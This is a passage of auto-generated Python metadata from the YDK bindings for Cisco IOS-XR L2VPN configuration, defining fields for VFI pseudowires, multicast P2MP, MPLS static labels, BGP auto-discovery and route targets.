_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' Two byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable LDP as Signaling Protocol
.Deletion of this object also causes
deletion of all objects under
LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
